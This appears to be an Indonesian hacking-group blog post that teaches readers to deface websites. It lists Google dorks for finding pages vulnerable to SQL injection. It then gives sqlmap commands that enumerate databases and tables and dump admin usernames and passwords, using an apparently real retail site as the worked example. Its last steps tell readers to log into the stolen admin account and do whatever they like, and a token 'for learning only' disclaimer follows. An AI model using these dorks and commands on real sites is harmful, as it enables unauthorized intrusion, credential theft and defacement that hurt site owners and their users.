Deface Website Menggunakan SQLMAP




sebelum melakukan hacking jangan lupa siapkan target yang sudah vuln terhadap sql injection
bisa mencarinya dengan google dork atau menggunakan uniscan , owasp-zap, nikto , vega dll
google dork dibawah ini
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=

jika sudah mendapatkan target


1. buka terminal
jika ingin melihat option pada sqlmap
ketik dengan  perintah : sqlmap -h


2. untuk melakukan hacking berikan perintah :


disini menandakan bahwa website tersebut vuln & jika ada pesan berikut tekan y lalu  enter

di dalam kasus saya, saya mendapatkan 2 buah database & copy database tersebut untuk melanjutkan sql

3. lanjutkan lagi dengan perintah
untuk melihat isi tables

sqlmap -u http://www.target-anda.com/php?id=sekian -D database-target –tables
CONTOH: sqlmap -u www.skechers.com.hk/product.php?id=1152 -D skechers_ztagedb –tables
bisa langsung lompat untuk melihat columns dengan perintah
sqlmap -u http://www.target-anda.com/php?id=sekian -D database-target –columns
CONTOH : sqlmap -u www.skechers.com.hk/product.php?id=1152 -D skechers_ztagedb –columns
tetapi dalam kasus saya , saya lupa untuk menggunakan columns
hehehe
oke gak apa-apa kita lanjutkan saja
4. Disini saya sudah mendapatkan tabel serta daftar dari website tersebut
cari table atau columns yang berisikan nama user / admin / password atau apalah yang terhubung dengan username / password

5. saatnya mencari password  & user admin
dengan perintah :

sqlmap -u http://www.target-anda.com/php?id=sekian -D database-target -T admin –dump
CONTOH: sqlmap -u www.skechers.com.hk/product.php?id=1152 -D skechers_ztagedb -T bz_admin –dump

dan secara otomatis sqlmap akan mencari user & password admin yang tersimpan pada website tersebut

6. cari halaman login admin website tersebut & masukan username & password yang telah kita dapatkan

7. LOGIN ^_^ 

8. masuk ke dalam directory & kalian bebas melakukan apapun pada website tersebut

INI HANYA PEMBELAJARAN
KAMI TIDAK BERTANGGUNG JAWAB ATAS APA YANG ANDA LAKUKAN TERHADAP WEBSITE ORANG LAIN :v

Official : Red White Spirit Team
-DiffMuRis
-Mr.Robot
-
[V]404_NOT_FOUND
-MR.P41J0
-DinzCanci

Komentar

Posting Komentar

Postingan populer dari blog ini

Pengertian DOS , UNIX , LINUX , Microsoft Windows , Dan Apple / Machintos

Tutorial Deface Menggunakan Sql Lokomedia ( NEW )